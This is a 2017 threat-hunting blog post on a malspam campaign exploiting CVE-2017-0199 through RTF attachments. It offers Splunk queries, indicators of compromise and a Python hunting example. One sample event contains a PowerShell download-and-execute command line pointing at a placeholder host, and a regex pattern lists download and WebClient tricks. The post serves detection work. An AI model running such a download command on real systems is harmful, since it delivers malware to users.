Sunday, August 27, 2017

Malspam campaign exploiting CVE-2017-0199: a hunting approach

In the last few days I have seen a few malspam emails with RTF files attached.

The mails pose as a fake shipping order with a ZIP attachment containing the malicious RTF file. An example of this file is https://virustotal.com/#/file/cc1cca6b713f6ab0ddb81639b64e52f12a9875ab1e08034d5722826aef4b3164/detection

This malicious RTF file exploits CVE-2017-0199.

This campaign relies on PowerShell, so monitoring for suspicious PowerShell command executions would detect it. I wrote a bit about this approach here.

In this case, monitoring all HTTP/S connections opened by PowerShell would detect it:


index=main powershell "tag::eventtype"=network 
| table _time  process DestinationHostname DestinationIp DestinationPort 


Alternatively, hunt for any PowerShell command with suspicious parameters, for example with the following Splunk query:

index=main Powershell | regex CommandLine="(?i).*-en|-e|-encoded|hidden|download|webclient|invoke-expression|new-object|base64|createobject|uploadfile.*"
| table _time ParentCommandLine CommandLine

Coming back to the initial RTF file, the PowerShell command executed is as follows:



It basically acts as a dropper for hxxps://www.iso9001-certificare.ro/a/Seal_Encrypted.exe. The malicious file is in VT.

However, the use cases above are generic ones for detecting suspicious PowerShell commands, and I am interested in detecting this specific CVE-2017-0199 exploitation scenario.

During the attack phase Winword.exe retrieves a malicious HTA file from a remote server via HTTPS. With this in mind, we can create a Splunk search to detect any ".hta" file stored as a temporary internet file in the user's "AppData" directory and created by Winword.exe.

For example, a query like this does the job:


index=main EventDescription="File Created" Image="*Winword*" 
TargetFilename="*AppData*\.hta" | table Image TargetFilename

The file retrieved in this case is hxxps://www.iso9001-certificare.ro/a/12.hta.

I have uploaded a copy of the file here: https://virustotal.com/#/file/e6bf9b7fbf30e2ba8bc2c6c0ee117f6cbb604b25fb0b4be24a3fb3e062987b3d/community

Another approach is to hunt for any PowerShell process whose parent process is mshta.exe:


index=main  ParentImage="*mshta.exe" CommandLine=*powershell* 
| table _time ParentCommandLine CommandLine 
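The three hunts above (Winword writing an .hta under AppData, PowerShell spawned by mshta.exe, and PowerShell with suspicious parameters) can be run outside Splunk as well. The following is an added example, not part of the original post: it applies the same logic to a handful of constructed Sysmon-style events using the field names from the queries above (EventDescription, Image, TargetFilename, ParentImage, CommandLine); the hostname in the sample is a placeholder, and the parameter regex is the blog's list tightened with word boundaries on -e/-en.

```python
import re

# Constructed Sysmon-style events; paths, user and URL are made up for this example.
SAMPLE_EVENTS = [
    {"EventDescription": "File Created",
     "Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Microsoft\Windows\INetCache\IE\A1B2C3D4\12[1].hta"},
    {"EventDescription": "File Created",
     "Image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Temp\~WRD0001.tmp"},  # benign Word temp file
    {"EventDescription": "Process Create",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden (New-Object Net.WebClient).DownloadFile("
                    "'https://example.invalid/a/payload.exe','%TEMP%\\x.exe')"},
    {"EventDescription": "Process Create",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-ChildItem C:\\logs"},  # benign admin use
]

# Suspicious-parameter alternatives from the second Splunk query above.
SUSPICIOUS_PS = re.compile(
    r"-en\b|-e\b|-encoded|hidden|download|webclient|invoke-expression"
    r"|new-object|base64|createobject|uploadfile",
    re.IGNORECASE,
)

def hunt(events):
    """Return (rule_name, event) pairs for every event matching one of the three hunts."""
    hits = []
    for ev in events:
        image = ev.get("Image", "").lower()
        if ev.get("EventDescription") == "File Created" and "winword" in image:
            target = ev.get("TargetFilename", "").lower()
            # Winword.exe writing an .hta into the user's AppData (temporary internet files)
            if "appdata" in target and target.endswith(".hta"):
                hits.append(("winword_hta_appdata", ev))
        elif ev.get("EventDescription") == "Process Create" and "powershell" in image:
            # PowerShell launched by mshta.exe, as in the CVE-2017-0199 chain
            if ev.get("ParentImage", "").lower().endswith("mshta.exe"):
                hits.append(("powershell_child_of_mshta", ev))
            # Generic suspicious-parameter hunt; one hit per event regardless of match count
            if SUSPICIOUS_PS.search(ev.get("CommandLine", "")):
                hits.append(("powershell_suspicious_args", ev))
    return hits

if __name__ == "__main__":
    for rule, ev in hunt(SAMPLE_EVENTS):
        print(rule, "->", ev.get("TargetFilename") or ev.get("CommandLine"))
```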

Indicators:

www.iso9001-certificare.ro
www.iso9001-certificare.ro/a/12.hta
ww.iso9001-certificare.ro/a/Seal_Encrypted.exe
aea9347409f465a5d9665f868c5258c6 - 12.hta
1db41de874e3539762ea7ea3b416de2d - Po-096.doc
ff61db305ab6f924451cdbe51c66ba1e - Po-096.zip
c1e4f507f85420ad116acf521dc241c6 - drgtgrt.exe